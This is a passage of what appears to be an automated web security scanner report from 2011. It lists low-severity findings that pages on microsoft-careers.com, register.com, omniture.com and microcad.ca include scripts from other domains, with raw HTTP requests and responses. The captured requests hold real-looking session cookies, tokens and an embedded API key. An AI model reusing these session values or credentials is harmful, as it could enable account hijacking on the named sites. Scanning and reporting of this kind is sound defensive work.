<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js"></script>
...[SNIP]...

18.282. https://www.microcad.ca/checkout/address previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microcad.ca
Path:	/checkout/address

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js
https://seal.godaddy.com/getSeal?sealID=J1AC4JSCyRkHT7RkNR74WDnAE6gCXcX7GcaWPukWaY1iN1vWF7f2CMS85

Request

GET /checkout/address HTTP/1.1
Host: www.microcad.ca
Connection: keep-alive
Referer: http://www.microcad.ca/cart
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: public=mrff84dil681s0lpbfousev6i6; mf_user=1; mf_session=bc76099c1b4cf7981cbda530d0e66b84; __utma=84250501.1276542809.1315085415.1315085415.1315085415.1; __utmb=84250501.2.10.1315085415; __utmc=84250501; __utmz=84250501.1315085415.1.1.utmcsr=google|utmccn=(not%20set)|utmcmd=product-search|utmctr=ssl%20certificates; mf_lastpageview=1315085500060

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:35:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /auth/login
Vary: Accept-Encoding
Content-Length: 21738
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">

<h4>A PHP Error was encountered</h4>

<p>Severity: Notice</p>
<p>Message: Undefined variable: data</p>
<p>Filename: mode
...[SNIP]...
<p id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=J1AC4JSCyRkHT7RkNR74WDnAE6gCXcX7GcaWPukWaY1iN1vWF7f2CMS85"></script>
...[SNIP]...

<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js"></script>
...[SNIP]...

18.283. http://www.microsoft-careers.com/find.job previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/find.job

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /find.job HTTP/1.1
Host: www.microsoft-careers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.284. http://www.microsoft-careers.com/job/Cambridge-Database-Administrator-TV-2FVideo-Advertising-Job-MA-02138/1394190/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-Database-Administrator-TV-2FVideo-Advertising-Job-MA-02138/1394190/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://cdn.socialtwist.com/200901147338/script.js
http://platform.linkedin.com/in.js

Request

GET /job/Cambridge-Database-Administrator-TV-2FVideo-Advertising-Job-MA-02138/1394190/ HTTP/1.1
Host: www.microsoft-careers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:28:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<link href="/sites/microsoft_global/css/job.css" rel="stylesheet" type="text/css" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<div id="social-network-button">


                       <script type="text/javascript" src="http://cdn.socialtwist.com/200901147338/script.js"></script>
...[SNIP]...
<div id="liConnections"><script type="text/javascript" src="http://platform.linkedin.com/in.js">api_key: 2engpjnq_X36tzHVQAh_e_GZL7jlBa9iJ1mUTHp4r5b-4NOIlyyl0ouIKG-xADIZonLoad: onLinkedInLoadauthorize: true</script>
...[SNIP]...

18.285. http://www.microsoft-careers.com/job/Cambridge-Product-Planner,-Lead-APS-754562-Job-MA-02138/1248350/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-Product-Planner,-Lead-APS-754562-Job-MA-02138/1248350/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://cdn.socialtwist.com/200901147338/script.js
http://platform.linkedin.com/in.js

Request

GET /job/Cambridge-Product-Planner,-Lead-APS-754562-Job-MA-02138/1248350/ HTTP/1.1
Host: www.microsoft-careers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:28:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<link href="/sites/microsoft_global/css/job.css" rel="stylesheet" type="text/css" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<div id="social-network-button">


                       <script type="text/javascript" src="http://cdn.socialtwist.com/200901147338/script.js"></script>
...[SNIP]...
<div id="liConnections"><script type="text/javascript" src="http://platform.linkedin.com/in.js">api_key: 2engpjnq_X36tzHVQAh_e_GZL7jlBa9iJ1mUTHp4r5b-4NOIlyyl0ouIKG-xADIZonLoad: onLinkedInLoadauthorize: true</script>
...[SNIP]...

18.286. http://www.microsoft-careers.com/job/Cambridge-Program-Manager-Interactive-Entertainment-Business-Job-MA-02138/1186137/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-Program-Manager-Interactive-Entertainment-Business-Job-MA-02138/1186137/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://cdn.socialtwist.com/200901147338/script.js
http://platform.linkedin.com/in.js

Request

GET /job/Cambridge-Program-Manager-Interactive-Entertainment-Business-Job-MA-02138/1186137/ HTTP/1.1
Host: www.microsoft-careers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.287. http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://cdn.socialtwist.com/200901147338/script.js
http://platform.linkedin.com/in.js

Request

Response

18.288. http://www.microsoft-careers.com/job/Cambridge-Software-Development-Engineer-in-Test-II-Office-365-Job-MA-02138/1289133/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-Software-Development-Engineer-in-Test-II-Office-365-Job-MA-02138/1289133/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://cdn.socialtwist.com/200901147338/script.js
http://platform.linkedin.com/in.js

Request

GET /job/Cambridge-Software-Development-Engineer-in-Test-II-Office-365-Job-MA-02138/1289133/ HTTP/1.1
Host: www.microsoft-careers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.289. http://www.microsoft-careers.com/job/Cambridge-Software-Test-Engineer-28SDET-29-II-Job-MA-02138/1383264/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-Software-Test-Engineer-28SDET-29-II-Job-MA-02138/1383264/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://cdn.socialtwist.com/200901147338/script.js
http://platform.linkedin.com/in.js

Request

GET /job/Cambridge-Software-Test-Engineer-28SDET-29-II-Job-MA-02138/1383264/ HTTP/1.1
Host: www.microsoft-careers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:28:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<link href="/sites/microsoft_global/css/job.css" rel="stylesheet" type="text/css" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<div id="social-network-button">


                       <script type="text/javascript" src="http://cdn.socialtwist.com/200901147338/script.js"></script>
...[SNIP]...
<div id="liConnections"><script type="text/javascript" src="http://platform.linkedin.com/in.js">api_key: 2engpjnq_X36tzHVQAh_e_GZL7jlBa9iJ1mUTHp4r5b-4NOIlyyl0ouIKG-xADIZonLoad: onLinkedInLoadauthorize: true</script>
...[SNIP]...

18.290. http://www.microsoft-careers.com/job/Cambridge-System-Engineer-TV-2FVideo-Advertising-Job-MA-02138/1394205/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-System-Engineer-TV-2FVideo-Advertising-Job-MA-02138/1394205/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://cdn.socialtwist.com/200901147338/script.js
http://platform.linkedin.com/in.js

Request

GET /job/Cambridge-System-Engineer-TV-2FVideo-Advertising-Job-MA-02138/1394205/ HTTP/1.1
Host: www.microsoft-careers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.291. http://www.microsoft-careers.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://cdn.socialtwist.com/200901147338/script.js
http://platform.linkedin.com/in.js

Request

Response

18.292. https://www.microsoft-careers.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET / HTTP/1.1
Host: www.microsoft-careers.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PWZKZXS192.168.50.232CKOUJ; CFID=40795863; CFTOKEN=90534017; JSESSIONID=7c305511ba2da977588c595e786a4e14f156; BROWSERTYPE=standard; PREFERREDBROWSER=standard; COOKIECHECK=10; TCPASSWORD=; EMAIL=; USERID=11; REMEMBERME=; REFERRERSTRING=http%3A%2F%2Fmicrosoftcambridge%2Ecom%2FWorking%2FJobs%2Ftabid%2F145%2FDefault%2Easpx; LANDINGPAGE=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Fjob%2FCambridge%2DSDE%2D2C%2DSenior%2D763405%2DJob%2DMA%2D02138%2F1388917%2F%3Futm%5Fsource%3DJ2WRSS%26utm%5Fmedium%3Drss%26utm%5Fcampaign%3DNERD; __utma=222260868.1458567656.1315055374.1315055374.1315055374.1; __utmb=222260868.4.10.1315055374; __utmc=222260868; __utmz=222260868.1315055374.1.1.utmcsr=J2WRSS|utmccn=NERD|utmcmd=rss

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:10:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<link href="/sites/microsoft_global/css/home.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...

18.293. https://www.microsoft-careers.com/content/corporate-research/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/content/corporate-research/

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /content/corporate-research/ HTTP/1.1
Host: www.microsoft-careers.com
Connection: keep-alive
Referer: https://www.microsoft-careers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PWZKZXS192.168.50.232CKOUJ; CFID=40795863; CFTOKEN=90534017; JSESSIONID=7c305511ba2da977588c595e786a4e14f156; BROWSERTYPE=standard; PREFERREDBROWSER=standard; COOKIECHECK=10; TCPASSWORD=; EMAIL=; USERID=11; REMEMBERME=; REFERRERSTRING=http%3A%2F%2Fmicrosoftcambridge%2Ecom%2FWorking%2FJobs%2Ftabid%2F145%2FDefault%2Easpx; LANDINGPAGE=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Fjob%2FCambridge%2DSDE%2D2C%2DSenior%2D763405%2DJob%2DMA%2D02138%2F1388917%2F%3Futm%5Fsource%3DJ2WRSS%26utm%5Fmedium%3Drss%26utm%5Fcampaign%3DNERD; __utma=222260868.1458567656.1315055374.1315055374.1315055374.1; __utmb=222260868.4.10.1315055374; __utmc=222260868; __utmz=222260868.1315055374.1.1.utmcsr=J2WRSS|utmccn=NERD|utmcmd=rss

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:10:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<link href="/sites/microsoft_global/css/custom.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...

18.294. https://www.microsoft-careers.com/find.job previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/find.job

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js

Request

Response

18.295. https://www.microsoft-careers.com/find.job previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/find.job

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /find.job HTTP/1.1
Host: www.microsoft-careers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:28:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<link href="/sites/microsoft_global/css/home.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...

18.296. https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/go/Microsoft-Research-Jobs/217358/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
https://platform.linkedin.com/in.js

Request

GET /go/Microsoft-Research-Jobs/217358/ HTTP/1.1
Host: www.microsoft-careers.com
Connection: keep-alive
Referer: https://www.microsoft-careers.com/content/corporate-research/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PWZKZXS192.168.50.232CKOUJ; CFID=40795863; CFTOKEN=90534017; JSESSIONID=7c305511ba2da977588c595e786a4e14f156; BROWSERTYPE=standard; PREFERREDBROWSER=standard; COOKIECHECK=10; TCPASSWORD=; EMAIL=; USERID=11; REMEMBERME=; REFERRERSTRING=http%3A%2F%2Fmicrosoftcambridge%2Ecom%2FWorking%2FJobs%2Ftabid%2F145%2FDefault%2Easpx; LANDINGPAGE=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Fjob%2FCambridge%2DSDE%2D2C%2DSenior%2D763405%2DJob%2DMA%2D02138%2F1388917%2F%3Futm%5Fsource%3DJ2WRSS%26utm%5Fmedium%3Drss%26utm%5Fcampaign%3DNERD; __utma=222260868.1458567656.1315055374.1315055374.1315055374.1; __utmb=222260868.4.10.1315055374; __utmc=222260868; __utmz=222260868.1315055374.1.1.utmcsr=J2WRSS|utmccn=NERD|utmcmd=rss

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<link href="/sites/microsoft_global/css/entertainment-and-devices.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<div id="liConnections"><script type="text/javascript" src="https://platform.linkedin.com/in.js">api_key: 2engpjnq_X36tzHVQAh_e_GZL7jlBa9iJ1mUTHp4r5b-4NOIlyyl0ouIKG-xADIZonLoad: onLinkedInLoadauthorize: true</script>
...[SNIP]...

18.297. https://www.microsoft-careers.com/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
https://platform.linkedin.com/in.js

Request

GET /job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/ HTTP/1.1
Host: www.microsoft-careers.com
Connection: keep-alive
Referer: https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PWZKZXS192.168.50.232CKOUJ; CFID=40795863; CFTOKEN=90534017; JSESSIONID=7c305511ba2da977588c595e786a4e14f156; BROWSERTYPE=standard; PREFERREDBROWSER=standard; COOKIECHECK=10; TCPASSWORD=; EMAIL=; USERID=11; REMEMBERME=; REFERRERSTRING=http%3A%2F%2Fmicrosoftcambridge%2Ecom%2FWorking%2FJobs%2Ftabid%2F145%2FDefault%2Easpx; LANDINGPAGE=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Fjob%2FCambridge%2DSDE%2D2C%2DSenior%2D763405%2DJob%2DMA%2D02138%2F1388917%2F%3Futm%5Fsource%3DJ2WRSS%26utm%5Fmedium%3Drss%26utm%5Fcampaign%3DNERD; __utma=222260868.1458567656.1315055374.1315055374.1315055374.1; __utmb=222260868.4.10.1315055374; __utmc=222260868; __utmz=222260868.1315055374.1.1.utmcsr=J2WRSS|utmccn=NERD|utmcmd=rss

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:14:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<link href="/sites/microsoft_global/css/job.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<div id="liConnections"><script type="text/javascript" src="https://platform.linkedin.com/in.js">api_key: 2engpjnq_X36tzHVQAh_e_GZL7jlBa9iJ1mUTHp4r5b-4NOIlyyl0ouIKG-xADIZonLoad: onLinkedInLoadauthorize: true</script>
...[SNIP]...

18.298. https://www.microsoft-careers.com/talentcommunity/subscribe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/talentcommunity/subscribe/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
https://platform.linkedin.com/in.js

Request

Response

18.299. http://www.omniture.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/

Issue detail

The response dynamically includes the following script from another domain:

http://pixel.mathtag.com/event/js?mt_id=108024&mt_adid=111&v1=&v2=&v3=&s1=&s2=&s3=

Request

GET /en/ HTTP/1.1
Host: www.omniture.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_cid=38212; s_iid=38573; cms_site_lang=1; offer_version=a%3A1%3A%7Bi%3A1057%3Bi%3A187%3B%7D; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1313976253453-233900.19#1316119783|check#true#1314910243|session#1314910182276-94505#1314912043; elqCustomerGUID=19ddb6ae-1941-431a-9104-41006951b164; campaign_stack=%5B%5B'38212'%2C'1313976267286'%5D%5D; b1=Logged%3A%20Banner%20Group%3A%20Search+Engine+Land+-+300x250+-+ROS; b2=Logged%3A%20Banner%3A%20300x250+-+2629+CV2; _jsuid=7264741388645661943; s_osc=14885; s_lv=1314806934818; s_vnum=1317398913538%26vn%3D1; v1stsp=552ED6C388FBA32B

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Last-Modified: Fri, 02 Sep 2011 19:48:26 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
Vary: Accept-Encoding
xserver: www6.dmz
Content-Type: text/html; charset=utf-8
Content-Length: 47417
Cache-Control: public, max-age=14400
Expires: Sat, 03 Sep 2011 18:43:31 GMT
Date: Sat, 03 Sep 2011 14:43:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Online Marketing Suite po
...[SNIP]...
</div>
<script type="text/javascript" src="http://pixel.mathtag.com/event/js?mt_id=108024&mt_adid=111&v1=&v2=&v3=&s1=&s2=&s3="></script>
...[SNIP]...

18.300. http://www.register.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

Response

18.301. http://www.register.com/domain/searchresults.rcmx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/domain/searchresults.rcmx

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

GET /domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

18.302. http://www.register.com/unauthenticated_session_expired.rcmx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/unauthenticated_session_expired.rcmx

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

Response

18.303. https://www.sslmatrix.com/Order/quickorder previous next

Summary

Severity:	Information
Confidence:	Certain
